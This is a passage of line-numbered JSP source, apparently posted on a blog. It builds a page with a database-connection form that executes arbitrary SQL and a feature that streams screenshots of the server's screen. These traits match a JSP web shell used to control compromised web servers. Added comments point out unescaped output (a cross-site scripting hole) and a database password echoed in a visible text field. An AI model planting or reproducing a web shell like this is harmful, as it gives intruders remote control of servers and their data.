1454                         <option value="DB2">DB2</option>
1455                         <option value="Other">Other</option>
1456                         <%
1457                         }else if("Oracle".equalsIgnoreCase(dbType)){
1458                             %>
1459                         <option value="Mysql">Mysql</option>
1460                         <option value="Oracle" selected="selected">Oracle</option>
1461                         <option value="SQLServer">SQLServer</option>
1462                         <option value="DB2">DB2</option>
1463                         <option value="Other">Other</option>
1464                         <%
1465                         }else if("DB2".equalsIgnoreCase(dbType)){
1466                             %>
1467                         <option value="Mysql">Mysql</option>
1468                         <option value="Oracle">Oracle</option>
1469                         <option value="SQLServer">SQLServer</option>
1470                         <option value="DB2" selected="selected">DB2</option>
1471                         <option value="Other">Other</option>
1472                         <%
1473                         }else if("SQLServer".equalsIgnoreCase(dbType)){
1474                             %>
1475                         <option value="Mysql">Mysql</option>
1476                         <option value="Oracle">Oracle</option>
1477                         <option value="SQLServer" selected="selected">SQLServer</option>
1478                         <option value="DB2">DB2</option>
1479                         <option value="Other">Other</option>
1480                         <%
1481                         }else if("Other".equalsIgnoreCase(dbType)){
1482                             %>
1483                         <option value="Mysql">Mysql</option>
1484                         <option value="Oracle">Oracle</option>
1485                         <option value="SQLServer">SQLServer</option>
1486                         <option value="DB2">DB2</option>
1487                         <option value="Other" selected="selected">Other</option>
1488                         <%
1489                         }
1490                         %>
1491                 </select></td>
1492             </tr>
1493
         <%-- Every value attribute below echoes the corresponding variable without
              HTML escaping; a variable that is still null is rendered as "null". --%>
1494             <tr>
1495                 <td align="right"><%=orChinese("Driver") %>:</td>
1496                 <td align="left"><input type="text" size="50" class="trans" name="driver" value="<%=driver %>" /></td>
1497             </tr>
1498             <%
1499             if ("Other".equalsIgnoreCase(dbType)){
1500                 %>
1501             <tr>
1502                 <td align="right"><%=orChinese("Connect URL") %>:</td>
1503                 <td align="left"><input type="text" size="50" class="trans" name="connurl" value="<%=connurl %>" /></td>
1504             </tr>
1505             <%
1506             }else{
1507                 %>
1508             <tr>
1509                 <td align="right"><%=orChinese("Host") %>:</td>
1510                 <td align="left"><input type="text" size="50" class="trans" name="host" value="<%=host %>" /></td>
1511             </tr>
1512             <tr>
1513                 <td align="right"><%=orChinese("Port") %>:</td>
1514                 <td align="left"><input type="text" size="50" class="trans" name="port" value="<%=port %>" /></td>
1515             </tr>
1516             <tr>
1517                 <td align="right"><%=orChinese("DB Name") %>:</td>
1518                 <td align="left"><input type="text" size="50" class="trans" name="dbname" value="<%=dbname %>" /></td>
1519             </tr>
1520             <%
1521             }
1522             %>
1523             <tr>
1524                 <td align="right"><%=orChinese("Username") %>:</td>
1525                 <td align="left"><input type="text" size="50" class="trans" name="dbuser" value="<%=dbuser %>" /></td>
1526             </tr>
1527             <tr>
1528                 <td align="right"><%=orChinese("Password") %>:</td>
         <%-- The password is echoed back into a type="text" input, so it is visible
              in the rendered page. --%>
1529                 <td align="left"><input type="text" size="50" class="trans" name="dbpass" value="<%=dbpass %>" /></td>
1530             </tr>
1531             <tr>
1532                 <td align="right"><%=orChinese("Connect") %>:</td>
1533                 <td align="left"><input type="button" class="trans" value="<%=orChinese("Connect") %>" onclick="dbsubmit(‘connect‘)" /> <input type="button"
1534                     class="trans" value="<%=orChinese("Disconnect") %>" onclick="dbsubmit(‘disconnect‘)" /></td>
1535             </tr>
1536             <tr>
1537                 <td align="right"><%=orChinese("SQL") %>:</td>
1538                 <td><input type="text" class="trans" size="100" name="sql" value="<%=sql %>" /> <input type="submit" class="trans"
1539                     value="<%=orChinese("Execute") %>" onclick="dbsubmit(‘execute‘)" /></td>
1540             </tr>
1541             <tr height="50">
1542                 <td colspan="2"><%=SQLResult %></td>
         <%-- `<tr />` does not close the row opened above; the intended tag is </tr>. --%>
1543             <tr />
1544         </table>
1545     </form>
1546     <%}
1547     if (action.equals("screen")){
         // action=screen: renders a Refresh button (reloads the page) and an <img> whose
         // src requests action=getscreen on this same URI; that image is produced by the
         // getscreen branch that follows.
1548         %>
1549         <div class="container" align="left">
1550             <input type="button" value="<%=orChinese("Refresh") %>" class="trans" onclick="javascript:location = location" />
1551             <img style="-webkit-user-select: none; cursor: zoom-in;" width="100%" src="<%=request.getRequestURI()+"?action=getscreen" %>" />
1552         </div>
1553         <%
1554     }
1555     if (action.equals("getscreen")){
         // action=getscreen: discards any HTML already buffered in `out` and switches to a
         // fresh body buffer before handing request/response to getScreenImg() (defined
         // outside this view) — presumably so it can write a raw image to the response.
         // The pushed body is not popped within this branch; confirm where it is popped.
1556         out.clear();
1557         out = pageContext.pushBody();
1558         this.getScreenImg(request, response);
1559     }
1560     %>
1561     <%}%>
1562     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=ENG" %>‘,window.location.href)">English</a>&nbsp;
1563     <a href="#" onclick="languageChanged(‘<%=request.getRequestURI()+"?action=lang&lang=CHN" %>‘,window.location.href)">中文</a>
1564 </body>
1565 </html>

截图:

时间: 2024-10-08 17:51:11
